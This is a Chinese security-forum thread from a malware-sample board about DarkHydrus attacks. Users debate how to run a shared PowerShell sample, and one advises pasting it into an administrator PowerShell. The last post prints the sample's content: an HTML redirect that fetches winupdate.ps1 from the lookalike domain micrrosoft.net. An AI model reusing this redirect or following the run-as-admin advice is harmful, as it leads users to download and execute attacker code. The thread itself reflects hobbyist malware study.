楼主: 275751198
收起左侧

[病毒样本] DarkHydrus针对中东政府发起攻击部分样本

[复制链接]
ELOHIM
发表于 2018-8-6 20:04:59 | 显示全部楼层
Karna 发表于 2018-8-6 19:37
所以到底如何执行呢,大神快讲讲,我现在有时间双击


我真的不大神。刚才在打游戏呢。。
你特想执行这个脚本的话,把它改成最低权限吧。
不是有四种模式吗?
或者把脚本复制出来,管理员权限粘进去,回车。
我玩别的了。
Picca
发表于 2018-8-6 20:08:37 | 显示全部楼层
ELOHIM 发表于 2018-8-6 20:04
我真的不大神。刚才在打游戏呢。。
你特想执行这个脚本的话,把它改成最低权限吧。
不是有四种 ...

我修改了回复,看17楼
Picca
发表于 2018-8-6 20:15:23 | 显示全部楼层

你这个winupdate.ps1是错的,
文章里面的是这个
https://www.virustotal.com/#/fil ... d640e856e/detection
而你的是这个
https://www.virustotal.com/#/fil ... 26d64088c/detection

大小都差了这么多,根本就不一样好吗
Picca
发表于 2018-8-6 20:21:36 | 显示全部楼层
本帖最后由 Karna 于 2018-8-6 20:24 编辑
ELOHIM 发表于 2018-8-6 20:04
我真的不大神。刚才在打游戏呢。。
你特想执行这个脚本的话,把它改成最低权限吧。
不是有四种 ...

事实证明这个文件就是错的,根本不是文章中的那个powershell文件而且根本就不是powershell能执行的文件
从一开始就在说,这个文件执行是报错的,是语句错误,我截的那个图你没看吗?和管理员权限有什么关系啊
ELOHIM
发表于 2018-8-6 20:40:23 | 显示全部楼层
Karna 发表于 2018-8-6 20:21
事实证明这个文件就是错的,根本不是文章中的那个powershell文件,而且根本就不是powershell能执行的文件 ...


真的没细看。。。。我现在好好回顾一下。
ELOHIM
发表于 2018-8-6 20:43:26 | 显示全部楼层
Karna 发表于 2018-8-6 20:21
事实证明这个文件就是错的,根本不是文章中的那个powershell文件,而且根本就不是powershell能执行的文件 ...

你冷静一下啊,都回复过的贴子就不要再回去编辑了。
直接引用一下在新贴。

你执行的命令都是html,怎么会执行呢?
你把那个ps1下载下来,用文本编辑器打开,复制出来,放到powershell里面,回车,试一下。
Picca
发表于 2018-8-6 20:47:03 | 显示全部楼层
ELOHIM 发表于 2018-8-6 20:43
你冷静一下啊,都回复过的贴子就不要再回去编辑了。
直接引用一下在新贴。

仍然报错,还有别的说法吗?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ELOHIM
发表于 2018-8-6 20:50:22 | 显示全部楼层
Karna 发表于 2018-8-6 20:47
仍然报错,还有别的说法吗?

你是在逗我呢吗,大神…………
你把http后面的那一段复制出来回贴告诉我看一下。。
Picca
发表于 2018-8-6 20:54:22 | 显示全部楼层
ELOHIM 发表于 2018-8-6 20:50
你是在逗我呢吗,大神…………
你把http后面的那一段复制出来回贴告诉我看一下。。

这样,你直接把让我执行的语句回复给我
Picca
发表于 2018-8-6 21:01:44 | 显示全部楼层
ELOHIM 发表于 2018-8-6 20:50
你是在逗我呢吗,大神…………
你把http后面的那一段复制出来回贴告诉我看一下。。

<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://micrrosoft.net/winupdate.ps1?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqcyI6MX0.fADWc9hUOlh58R9UzufQBROmie3I7c7vE835oE6YmU4&uuid=2bf6264c-9951-11e8-b0a0-3a85dfd28002');</script></body></html>

这个帖子ps1的全部语句都在这里,来吧,你让我执行哪个? 告诉我哪个是powershell可以执行的语句
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-26 08:30 , Processed in 0.092821 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表